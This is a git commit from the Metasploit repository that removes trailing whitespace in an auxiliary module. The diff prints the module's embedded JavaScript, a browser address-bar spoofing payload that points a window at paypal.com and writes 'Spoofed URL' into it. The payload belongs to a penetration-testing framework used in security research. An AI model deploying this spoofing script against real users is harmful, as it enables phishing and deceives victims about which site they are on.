Spaces at EOL

GSoC/Meterpreter_Web_Console
Dhiraj Mishra 2018-06-09 11:53:21 +05:30 committed by GitHub
parent 6e8412fa73
commit f1d29e730f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 5 deletions

View File

@ -43,11 +43,11 @@ class MetasploitModule < Msf::Auxiliary
def setup
@html = <<-JS
<script type="text/javascript">
win = window.open("sleep_one_second.php", "WIN");
window.open("https://www.paypal.com", "WIN");
win.document.execCommand('Stop');
win.document.write("Spoofed URL");
win.document.close();
win = window.open("sleep_one_second.php", "WIN");
window.open("https://www.paypal.com", "WIN");
win.document.execCommand('Stop');
win.document.write("Spoofed URL");
win.document.close();
</script>
JS
end